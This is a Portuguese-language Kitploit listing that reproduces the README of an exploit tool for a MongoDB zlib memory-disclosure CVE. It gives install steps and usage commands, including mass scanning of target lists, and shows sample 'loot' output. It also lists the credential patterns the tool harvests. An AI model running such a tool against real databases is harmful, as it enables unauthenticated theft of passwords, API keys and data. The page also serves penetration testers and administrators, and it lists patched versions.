Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-14847_Expolit — Ferramenta de exploração para CVE-2025-14847, uma vulnerabilidade de divulgação de memória no MongoDB, que permite a extração multithread de dados sensíveis e segredos de instâncias vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/alexcyberx/cve-2025-14847_expolit
Forensia de MemóriaAnálise de VulnerabilidadesExploraçãoExfiltração de DadosTestes de PenetraçãoDetecção de SegredosSegurança de Banco de Dados
GitHubalexcyberx/cve-2025-14847_expolit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-14847_Expolit

Ferramenta de exploração para CVE-2025-14847, uma vulnerabilidade de divulgação de memória no MongoDB, que permite a extração multithread de dados sensíveis e segredos de instâncias vulneráveis.

Ver Repositório
24há 8 mesesAinda não revisado

MongoBleed-Pro ☠️

CVE Python License Status

Ferramenta Avançada de Exploração de Vazamento de Memória do MongoDB
Continue Aprendendo | Continue Hackeando com Alexcyberx


🔥 Sobre

MongoBleed-Pro é uma ferramenta avançada de exploração para CVE-2025-14847, uma vulnerabilidade crítica de divulgação de memória no tratamento da compressão zlib do MongoDB. Esta ferramenta permite que pesquisadores de segurança extraiam dados sensíveis de instâncias MongoDB vulneráveis.

⚠️ Aviso Legal

Esta ferramenta destina-se somente a testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal. Sempre obtenha autorização adequada antes de testar.


💀 Detalhes da Vulnerabilidade


🚀 Recursos

  • ☠️ UI Estilo Hacker - Interface de terminal de elite com animações
  • ⚡ Escaneamento Multi-thread - Extração rápida de memória com threads configuráveis
  • 🎯 Detecção Automática de Vulnerabilidade - Verificação automática de vulnerabilidade antes da exploração
  • 🔑 Detecção de Padrões de Segredos - Encontra chaves AWS, tokens de API, senhas e e-mails
  • 📊 Progresso em Tempo Real - Visualização ao vivo do vazamento de memória
  • 💾 Exportação de Dados - Salva os dados extraídos em arquivos para análise
  • 🌐 Escaneamento em Massa - Escaneie múltiplos alvos a partir de arquivo

📦 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 Uso

Uso Básico

root@kitploit:~
python3 mongobleed_pro.py

Alvo Específico

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Porta Personalizada

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Escaneamento em Massa

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Opções Avançadas

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

Todas as Opções


📸 Capturas de Tela

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Tipos de Segredos Detectados

  • 🔑 Chaves de Acesso AWS (AKIA...)
  • 🤖 Chaves de API da OpenAI (sk-...)
  • 🐙 Tokens do GitHub (ghp_...)
  • 🔐 Senhas e Segredos
  • 📧 Endereços de E-mail

📁 Arquivos de Saída

FileDescription
loot_<host>.txtSegredos extraídos em formato legível
dump_<host>.binDespejo de memória bruto para análise manual

🛡️ Mitigação

Se você é administrador do MongoDB, atualize para as versões corrigidas:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Autor

alexcyberx

  • 🐦 Instagram: @alex_cyberx

📜 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.


⭐ Suporte

Se você achou esta ferramenta útil, dê uma ⭐ no GitHub!


「 Continue Aprendendo | Continue Hackeando 」
Feito com ❤️ por alexcyberx

Baixar ferramenta
PropertyDetails
CVE IDCVE-2025-14847
Tipo de VulnerabilidadeDivulgação de Memória
Versões AfetadasMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Causa RaizLeitura além do limite no buffer da descompressão zlib
ImpactoVazamento remoto de memória sem autenticação
ArgumentDescriptionDefault
--targetIP/URL do alvoPrompt interativo
--fileArquivo com lista de alvosNenhum
--threadsNúmero de threads50
--min-offsetOffset mínimo de memória20
--max-offsetOffset máximo de memória8192